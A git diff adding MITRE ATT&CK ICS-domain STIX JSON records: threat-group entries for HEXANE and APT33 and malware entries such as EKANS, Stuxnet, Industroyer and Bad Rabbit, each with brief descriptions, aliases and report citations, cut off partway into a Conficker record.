@@ -0,0 +1,82 @@ +{ + "type": "bundle", + "id": "bundle--0c1a7584-83ac-42bc-afe5-20c74825315b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T04:43:59.082Z", + "name": "HEXANE", + "description": "[HEXANE](https://attack.mitre.org/groups/G1001) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://attack.mitre.org/groups/G1001)'s TTPs appear similar to [APT33](https://attack.mitre.org/groups/G0064) and [OilRig](https://attack.mitre.org/groups/G0049) but due to differences in victims and tools it is tracked as a separate entity.(Citation: Dragos Hexane)(Citation: Kaspersky Lyceum October 2021)(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)", + "aliases": [ + "HEXANE", + "Lyceum", + "Siamesekitten", + "Spirlin" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Dragos Threat Intelligence", + "Mindaugas Gudzis, BT Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--f29b7c5e-2439-42ad-a86f-9f8984fafae3", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1001", + "external_id": "G1001" + }, + { + "source_name": "Spirlin", + "description": "(Citation: Accenture Lyceum Targets November 2021)" + }, + { + "source_name": "Siamesekitten", + "description": "(Citation: ClearSky Siamesekitten August 2021)" + }, + { + "source_name": "Lyceum", + "description": "(Citation: SecureWorks August 2019)" + }, + { + "source_name": "Accenture Lyceum Targets November 2021", + "description": "Accenture. (2021, November 9). 
Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022.", + "url": "https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns" + }, + { + "source_name": "ClearSky Siamesekitten August 2021", + "description": "ClearSky Cyber Security . (2021, August). New Iranian Espionage Campaign By \u201cSiamesekitten\u201d - Lyceum. Retrieved June 6, 2022.", + "url": "https://www.clearskysec.com/siamesekitten/" + }, + { + "source_name": "Dragos Hexane", + "description": "Dragos. (n.d.). Hexane. Retrieved October 27, 2019.", + "url": "https://dragos.com/resource/hexane/" + }, + { + "source_name": "Kaspersky Lyceum October 2021", + "description": "Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.", + "url": "https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf" + }, + { + "source_name": "SecureWorks August 2019", + "description": "SecureWorks 2019, August 27 LYCEUM Takes Center Stage in Middle East Campaign Retrieved. 2019/11/19 ", + "url": "https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f.json new file mode 100644 index 0000000000000000000000000000000000000000..b12f82815f622216b547f91bdacdcc94f12deddd --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f.json 
@@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--cfa888f4-d07f-4399-9774-9e7bed10e2f9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:07:25.123Z", + "name": "APT33", + "description": "[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)", + "aliases": [ + "APT33", + "HOLMIUM", + "Elfin" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.4", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0064", + "external_id": "G0064" + }, + { + "source_name": "APT33", + "description": "(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)" + }, + { + "source_name": "HOLMIUM", + "description": "(Citation: Microsoft Holmium June 2020)" + }, + { + "source_name": "Elfin", + "description": "(Citation: Symantec Elfin Mar 2019)" + }, + { + "source_name": "FireEye APT33 Webinar Sept 2017", + "description": "Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.", + "url": "https://www.brighttalk.com/webcast/10703/275683" + }, + { + "source_name": "Microsoft Holmium June 2020", + "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. 
Retrieved June 22, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/" + }, + { + "source_name": "FireEye APT33 Sept 2017", + "description": "O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + }, + { + "source_name": "Symantec Elfin Mar 2019", + "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.", + "url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5.json new file mode 100644 index 0000000000000000000000000000000000000000..1d75218596afdd9aa15c48582e29d0d858784363 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5.json 
@@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--fa8e6294-60d7-45f2-800e-038db9f8edf2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:04:48.834Z", + "name": "EKANS", + "description": "[EKANS](https://attack.mitre.org/software/S0605) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "EKANS", + "SNAKEHOSE" + ], + "type": "malware", + "id": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "created": "2021-02-12T20:07:42.883Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0605", + "external_id": "S0605" + }, + { + "source_name": "EKANS", + "description": "(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)(Citation: FireEye Ransomware Feb 2020)" + }, + { + "source_name": "SNAKEHOSE", + "description": "(Citation: FireEye Ransomware Feb 2020)" + }, + { + "source_name": "Dragos EKANS", + "description": "Dragos. (2020, February 3). EKANS Ransomware and ICS Operations. 
Retrieved February 9, 2021.", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + }, + { + "source_name": "Palo Alto Unit 42 EKANS", + "description": "Hinchliffe, A. Santos, D. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.", + "url": "https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/" + }, + { + "source_name": "FireEye Ransomware Feb 2020", + "description": "Zafra, D., et al. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved March 2, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--083bb47b-02c8-4423-81a2-f9ef58572974.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--083bb47b-02c8-4423-81a2-f9ef58572974.json new file mode 100644 index 0000000000000000000000000000000000000000..4715dccf53ab14911473bb44d5e7534e2e204551 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--083bb47b-02c8-4423-81a2-f9ef58572974.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--1839570a-8279-474a-9c50-e53609c106e4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T17:18:25.971Z", + "name": "Backdoor.Oldrea", + "description": "[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a modular backdoor that used by [Dragonfly](https://attack.mitre.org/groups/G0035) against energy companies since at least 2013. [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)(Citation: Symantec Dragonfly Sept 2017)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "Backdoor.Oldrea", + "Havex" + ], + "type": "malware", + "id": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "created": "2017-05-31T21:32:59.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0093", + "external_id": "S0093" + }, + { + "source_name": "Gigamon Berserk Bear October 2021", + "description": "Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE\u2019S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.", + "url": "https://vblocalhost.com/uploads/VB2021-Slowik.pdf" + }, + { + "source_name": "Symantec Dragonfly Sept 2017", + "description": "Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. 
Retrieved September 9, 2017.", + "url": "https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers" + }, + { + "source_name": "Symantec Dragonfly", + "description": "Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", + "url": "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--088f1d6e-0783-47c6-9923-9c79b2af43d4.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--088f1d6e-0783-47c6-9923-9c79b2af43d4.json new file mode 100644 index 0000000000000000000000000000000000000000..df3f1f0ecd71636e2fcc90d5a76f719a38025aab --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--088f1d6e-0783-47c6-9923-9c79b2af43d4.json 
@@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--b157423a-32e7-446a-b821-04f30e477968", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T13:50:55.168Z", + "name": "Stuxnet", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) ", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "Stuxnet", + "W32.Stuxnet" + ], + "type": "malware", + "id": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "created": "2020-12-14T17:34:58.457Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0603", + "external_id": "S0603" + }, + { + "source_name": "W32.Stuxnet", + "description": "(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) " + }, + { + "source_name": "CISA ICS Advisory ICSA-10-272-01", + "description": "CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). 
Retrieved December 7, 2020.", + "url": "https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01" + }, + { + "source_name": "ESET Stuxnet Under the Microscope", + "description": "Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.", + "url": "https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + }, + { + "source_name": "Langer Stuxnet", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--1d8dccb3-e779-4702-aeb1-6627a22cc585.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--1d8dccb3-e779-4702-aeb1-6627a22cc585.json new file mode 100644 index 0000000000000000000000000000000000000000..34a511998d87d46cb32b39505cbf89325863174e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--1d8dccb3-e779-4702-aeb1-6627a22cc585.json 
@@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--11d7ae20-2dac-40dc-b3e9-011cdab559ba", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Industroyer", + "CRASHOVERRIDE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Industroyer", + "description": "[Industroyer](https://collaborate.mitre.org/attackics/index.php/Software/S0001) is a sophisticated piece of malware designed to cause an [Impact](https://collaborate.mitre.org/attackics/index.php/Impact) to the working processes of Industrial Control Systems (ICS), specifically ICSs used in electrical substations.(Citation: ESET Win32/Industroyer) Industroyer was alleged to be used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride)(Citation: CISA Alert (TA17-163A))(Citation: Dragos Crashoverride 2018)(Citation: Dragos Crashoverride 2019)", + "id": "malware--1d8dccb3-e779-4702-aeb1-6627a22cc585", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31T21:33:21.973Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "external_id": "S1004", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0001" + }, + { + "source_name": "ESET Win32/Industroyer", + "description": "Anton Cherepanov, ESET. (2017, June 12). Win32/Industroyer: A new threat for industrial control systems. Retrieved September 15, 2017.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride", + "description": "Dragos Inc.. (2017, June 13). Industroyer - Dragos - 201706: Analysis of the Threat to Electic Grid Operations. 
Retrieved September 18, 2017.", + "url": "https://www.dragos.com/wp-content/uploads/CrashOverride-01.pdf" + }, + { + "source_name": "CISA Alert TA17-163A CrashOverride June 2017", + "description": "CISA. (2017, June 12). Alert (TA17-163A). Retrieved October 22, 2019.", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-163A" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Dragos. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved October 14, 2019.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + }, + { + "source_name": "Dragos Crashoverride 2019", + "description": "Joe Slowik. (2019, August 15). CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack. Retrieved October 22, 2019.", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--242622ca-3903-43d5-8aa0-3bbdaa3020ec.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--242622ca-3903-43d5-8aa0-3bbdaa3020ec.json new file mode 100644 index 0000000000000000000000000000000000000000..5f1eb9fc5e1d70459176d9811b2929e2c2cf8557 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--242622ca-3903-43d5-8aa0-3bbdaa3020ec.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--38736127-7364-46ec-8bac-dc13ce2b1580", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Bad Rabbit", + "Diskcoder.D" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Bad Rabbit", + "description": "[Bad Rabbit](https://collaborate.mitre.org/attackics/index.php/Software/S0005) is a self-propagating (\u201cwormable\u201d) ransomware that affected the transportation sector in Ukraine. (Citation: ESET Bad Rabbit Oct 2017)", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--242622ca-3903-43d5-8aa0-3bbdaa3020ec", + "created": "2017-05-31T21:32:59.661Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "external_id": "S1001", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0005" + }, + { + "description": "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", + "source_name": "ESET Bad Rabbit Oct 2017", + "url": "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/" + }, + { + "description": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov. (2017, October 27). Bad Rabbit Ransomware. Retrieved October 27, 2019.", + "source_name": "Kaspersky Bad Rabbit Oct 2017", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + }, + { + "description": "Joe Slowik. (2019, April 10). Implications of IT Ransomware for ICS Environments. 
Retrieved October 27, 2019.", + "source_name": "Dragos IT Ransomware for ICS Environments Apr 2019", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a.json new file mode 100644 index 0000000000000000000000000000000000000000..db3d6948b066852cb6e3756a09cb7101ba438fc7 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--d8fc0555-f3d0-4619-b6ff-eaabddced37f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T17:29:57.200Z", + "name": "Bad Rabbit", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware) ", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Bad Rabbit", + "Win32/Diskcoder.D" + ], + "type": "malware", + "id": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "created": "2021-02-09T14:35:39.455Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0606", + "external_id": "S0606" + }, + { + "source_name": "ESET Bad Rabbit", + "description": "M.L\u00e9veille, M-E.. (2017, October 24). Bad Rabbit: Not\u2011Petya is back with improved ransomware. Retrieved January 28, 2021.", + "url": "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/" + }, + { + "source_name": "Secure List Bad Rabbit", + "description": "Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + }, + { + "source_name": "Dragos IT ICS Ransomware", + "description": "Slowik, J.. (2019, April 10). Implications of IT Ransomware for ICS Environments. 
Retrieved January 28, 2021.", + "url": "https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--496bff4d-0700-4b28-b06f-f30a63002be7.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--496bff4d-0700-4b28-b06f-f30a63002be7.json new file mode 100644 index 0000000000000000000000000000000000000000..8207e961b4b52199aa9c27bf4f1eb4d598efd948 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--496bff4d-0700-4b28-b06f-f30a63002be7.json 
@@ -0,0 +1,67 @@
+{
+ "type": "bundle",
+ "id": "bundle--eef19592-11e6-4fc3-a557-25f0848e5421",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "labels": [
+ "malware"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_aliases": [
+ "Stuxnet"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "name": "Stuxnet",
+ "description": "[Stuxnet](https://collaborate.mitre.org/attackics/index.php/Software/S0010) was the first publicly reported piece of malware to specifically target industrial control systems devices. Stuxnet is a large and complex piece of malware that utilized multiple different complex tactics including multiple zero-day vulnerabilites, a sophisticated Windows rootkit, and network infection routines.(Citation: Wired W32.Stuxnet Dossier Feb 2011)(Citation: Symantec W32.Stuxnet Writeup)(Citation: CISA ICS Advisory (ICSA-10-238-01B))(Citation: SCADAhacker Stuxnet Mitigation Jan 2014)",
+ "id": "malware--496bff4d-0700-4b28-b06f-f30a63002be7",
+ "x_mitre_version": "1.0",
+ "type": "malware",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "created": "2019-03-26T15:02:14.907Z",
+ "modified": "2021-10-21T14:00:00.188Z",
+ "external_references": [
+ {
+ "source_name": "mitre-ics-attack",
+ "external_id": "S1008",
+ "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0010"
+ },
+ {
+ "source_name": "Wired W32.Stuxnet Dossier Feb 2011",
+ "description": "Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.",
+ "url": "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf"
+ },
+ {
+ "source_name": "Symantec W32.Stuxnet Writeup",
+ "description": "Jarrad Shearer. (n.d.). W32.Stuxnet Writeup. Retrieved October 22, 2019.",
+ "url": "https://www.symantec.com/security-center/writeup/2010-071400-3123-99"
+ },
+ {
+ "source_name": "CISA ICS Advisory ICSA-10-238-01B Stuxnet January 2014",
+ "description": "CISA. (2014, January 08). Stuxnet Malware Mitigation (Update B). Retrieved October 22, 2019.",
+ "url": "https://www.us-cert.gov/ics/advisories/ICSA-10-238-01B"
+ },
+ {
+ "source_name": "SCADAhacker Stuxnet Mitigation Jan 2014",
+ "description": "Joel Langill. (2014, January 21). Stuxnet Mitigation. Retrieved October 22, 2019.",
+ "url": "https://scadahacker.com/resources/stuxnet-mitigation.html"
+ },
+ {
+ "source_name": "Langer Stuxnet Analysis Nov 2013",
+ "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved March 27, 2018.",
+ "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_deprecated": true
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--49c04994-1035-4b58-89b7-cf8956e3b423.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--49c04994-1035-4b58-89b7-cf8956e3b423.json
new file mode 100644
index 0000000000000000000000000000000000000000..a37e42b84cd2e81d743914f900a9cb28d19496cd
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--49c04994-1035-4b58-89b7-cf8956e3b423.json
@@ -0,0 +1,54 @@
+{
+ "type": "bundle",
+ "id": "bundle--cf631640-1f28-441b-931c-119c4b07efaa",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "labels": [
+ "malware"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_aliases": [
+ "Conficker",
+ "Downadup",
+ "Kido"
+ ],
+ "object_marking_refs": [
